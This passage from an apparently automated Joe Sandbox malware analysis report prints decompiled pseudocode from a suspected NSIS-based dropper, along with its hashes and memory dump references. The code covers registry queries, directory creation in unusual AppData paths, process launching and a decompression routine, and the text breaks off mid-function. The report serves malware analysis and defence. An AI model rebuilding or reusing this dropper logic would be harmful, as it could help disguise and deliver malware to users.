                                                          • Part of subcall function 00405BC8: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsr743A.tmp,?,00405C3C,C:\Users\user\AppData\Local\Temp\nsr743A.tmp,C:\Users\user\AppData\Local\Temp\nsr743A.tmp,?,?,766DFAA0,0040597A,?,C:\Users\user\AppData\Local\Temp\,766DFAA0,00000000), ref: 00405BD6
                                                          • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BDB
                                                          • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BF3
                                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                          • Part of subcall function 0040577F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057C2
                                                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth,?,00000000,000000F0), ref: 0040164D
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth, xrefs: 00401640
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                        • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth
                                                        • API String ID: 1892508949-4145137140
                                                        • Opcode ID: be059b02de55be546dd79f47ecb03ede3c1f21afff9b80660869a8e6f73aef5a
                                                        • Instruction ID: cf923580388ec08c1514b784e2bf170a85d63446f7292b2ca235e8bc108e1b76
                                                        • Opcode Fuzzy Hash: be059b02de55be546dd79f47ecb03ede3c1f21afff9b80660869a8e6f73aef5a
                                                        • Instruction Fuzzy Hash: 2E11BE31504105EBCF31AFA4CD0199F36A0EF15368B28493BFA45B22F2DA3E4D519B5E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040611A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 90%
                                                        			E0040611A(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004060B9(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
					_t21 = RegCloseKey(_a20); // executed
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                        0x00406128
                                                        0x0040612a
                                                        0x00406142
                                                        0x00406147
                                                        0x0040614c
                                                        0x0040618a
                                                        0x0040618a
                                                        0x0040614e
                                                        0x00406160
                                                        0x0040616b
                                                        0x00406171
                                                        0x0040617c
                                                        0x00000000
                                                        0x00000000
                                                        0x0040617c
                                                        0x00406190

                                                        APIs
                                                        • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,?,?,0040638E,80000002), ref: 00406160
                                                        • RegCloseKey.KERNELBASE(?,?,0040638E,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade), ref: 0040616B
                                                        Strings
                                                        • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade, xrefs: 00406121
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: CloseQueryValue
                                                        • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade
                                                        • API String ID: 3356406503-698099163
                                                        • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                        • Instruction ID: 8ef6f3e619af491bbf380fd7d91826ebef08e06ae3c58d0c48453c9b41c80383
                                                        • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                        • Instruction Fuzzy Hash: BF014872500209FBDF218F51C909ADB3BA8EB55364F01802AFD1AA61A1D678D964CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405831 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00405831(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4266f0->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x4266f0,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                        0x0040583a
                                                        0x0040585a
                                                        0x00405862
                                                        0x00405867
                                                        0x00000000
                                                        0x0040586d
                                                        0x00405871

                                                        APIs
                                                        Strings
                                                        • Error launching installer, xrefs: 00405844
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateHandleProcess
                                                        • String ID: Error launching installer
                                                        • API String ID: 3712363035-66219284
                                                        • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                        • Instruction ID: 0b6998b7e6fa6c2388fbdd89280d1adf89017549f97d9b179fdab4837609bc7e
                                                        • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                        • Instruction Fuzzy Hash: ADE0BFB560020ABFEB109F65ED09F7B76ACFB14604F414535BD51F2150D7B4E8158A7C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00406D8B Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 99%
                                                        			E00406D8B() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004071F9))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4)); // executed
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8)); // executed
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
